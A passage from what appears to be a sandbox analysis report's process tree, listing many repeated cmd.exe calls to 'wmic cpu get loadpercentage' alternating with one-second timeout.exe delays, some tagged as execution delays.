    PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:796
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4676
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4980
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4588
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2472
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
